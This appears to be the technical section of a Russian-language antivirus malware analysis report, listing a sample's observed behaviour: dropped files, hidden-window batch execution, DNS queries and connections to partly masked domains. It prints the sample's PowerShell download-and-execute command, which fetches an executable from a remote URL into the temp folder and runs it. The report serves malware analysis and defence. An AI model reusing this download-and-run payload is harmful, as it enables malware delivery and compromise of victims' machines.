Техническая информация
- $lnk как %temp%\einnbv.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function dwn([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\einnbv.exe'');Start-Process ''%TMP%\einnbv.exe'';}try{dwn(''http://th#######...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1357005.cvr
- %TEMP%\mxaznw.bat
- 'th#######entrum-stralsund.de':80
- 'th#######entrum-stralsund.de':443
- http://th#######entrum-stralsund.de/fiftyyearsnoth35.png
- http://www.th#######entrum-stralsund.de/fiftyyearsnoth35.png
- 'th#######entrum-stralsund.de':443
- DNS ASK th#######entrum-stralsund.de
- DNS ASK si####sfineart.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function dwn([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\einnbv.exe'');Start-Process ''%TMP%\einnbv.exe'';}try{dwn(''http://th#######...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Mxaznw.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Mxaznw.bat" "